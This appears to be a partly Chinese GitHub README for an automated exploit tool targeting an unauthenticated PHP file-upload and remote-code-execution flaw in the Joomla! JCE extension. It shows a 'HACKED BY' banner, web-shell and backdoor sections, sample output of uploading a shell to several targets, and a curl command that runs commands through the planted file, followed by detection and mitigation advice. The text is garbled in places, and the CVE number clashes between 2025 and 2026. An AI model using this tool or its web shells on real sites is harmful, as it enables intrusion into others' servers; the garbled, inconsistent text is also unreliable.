0xgh057r3c0n/CVE-2026-48907
GitHub: 0xgh057r3c0n/CVE-2026-48907
针对 Joomla! JCE 扩展未授权远程代码执行漏洞(CVE-2025-48907)的概念验证与自动化利用工具。
Stars: 0 | Forks: 0
CVE-2025-48907 - Joomla! JCE Unauthenticated RCE
Joomla! JCE extension < 2.9.99.5 - Unauthenticated Arbitrary PHP File Upload & Remote Code Execution
[](https://opensource.org/licenses/MIT) [](https://www.python.org/downloads/) [](https://github.com/0xgh057r3c0n/CVE-2025-48907)HACKED BY 0xgh057r3c0n
██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗
██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
███████║███████║██║ █████╔╝ █████╗ ██║ ██║
██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██║ ██║
██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██████╔╝
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═════╝
Security is not a product, it\'s a process.
Server:
Time:
'; ?> ``` ### PHP 后门 (极简版) 创建 `backdoor.php`: ``` ``` ## 📊 输出示例 ``` _____________ _______________ _______________ ________ ________ _____ ______ ________________________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/ _____/ / | | / __ \/ __ \ _ \______ \ / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ __ \ ______ / | |_> <\____ / /_\ \ / / \ \____\ / | \ /_____/ / \ \_/ \/ \ |__\ \ /_____/ / ^ / -- \ / /\ \_/ \/ / \______ / \___/ /_______ / \_______ \_____ /\_______ \_____ / \____ |\______ / /____/ \_____ /____/ \/ \/ \/ \/ \/ \/ |__| \/ \/ Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE Author : 0xgh057r3c0n (PHP File Upload) [*] Loaded 3 target(s) [*] Target 1/3 [*] ================================================== [+] Target: http://target-joomla.com [+] Fetching CSRF token... [+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6 [+] Uploading PHP file: cve-2026-48907-1234.xml.php [+] Profile imported successfully! [+] Testing uploaded PHP file... ============================================================ [!!!!!] PHP FILE UPLOADED SUCCESSFULLY! [!!!!!] Server IS VULNERABLE to CVE-2025-48907! ============================================================ [+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php [+] Quick access: curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id" ``` ## 🛡️ 检测与缓解 ### 如何检测 - 检查 `/tmp/` 目录中是否存在可疑的 PHP 文件 - 监控日志中的 JCE 配置文件导入活动 - 查找意外的 `index.php?option=com_jce&task=profiles.import` 请求 - 检查 `/tmp/` 中是否有扩展名为 `.xml.php` 的文件 - 监控 `/tmp/` 目录中异常的 PHP 执行情况 ### 缓解措施 1. **更新 JCE 扩展**: - 升级到 **2.9.99.5** 或更高版本 - 下载地址:[JCE 官方网站](https://www.joomlacontenteditor.net/) 2. **临时变通方案**: - 如果不需要,请禁用 JCE 扩展 - 实施Web 应用防火墙 (WAF) 规则 - 限制 `/tmp/` 目录中的 PHP 执行 - 如果不需要,请禁用 `allow_url_fopen` 3. **系统被入侵后的操作**: - 从 `/tmp/` 中删除上传的 PHP 文件 - 审计系统以查找后门 - 重置所有凭据 (Joomla 管理员、FTP、主机) - 检查系统日志以查找未经授权的访问 - 检查其他被篡改的文件 ## 📝 许可证 本项目基于 **MIT 许可证** 授权 - 有关详细信息,请参阅 [LICENSE](LICENSE) 文件。 [](https://opensource.org/licenses/MIT) ## 📞 联系与支持 - **作者**:[0xgh057r3c0n](https://github.com/0xgh057r3c0n) - **GitHub**:[https://github.com/0xgh057r3c0n/CVE-2025-48907](https://github.com/0xgh057r3c0n/CVE-2025-48907) - **问题**:[报告 Bug](https://github.com/0xgh057r3c0n/CVE-2025-48907/issues) ## 🔗 参考资料 - [NVD - CVE-2025-48907](https://nvd.nist.gov/vuln/detail/CVE-2025-48907) - [JCE 官方网站](https://www.joomlacontenteditor.net/) - [Joomla! 安全中心](https://developer.joomla.org/security-centre.html)
由 0xgh057r3c0n 用 ❤️ 构建
标签:CISA项目, Joomla, Python, Web安全, 无后门, 系统独立性, 编程工具, 蓝队分析, 远程代码执行, 逆向工具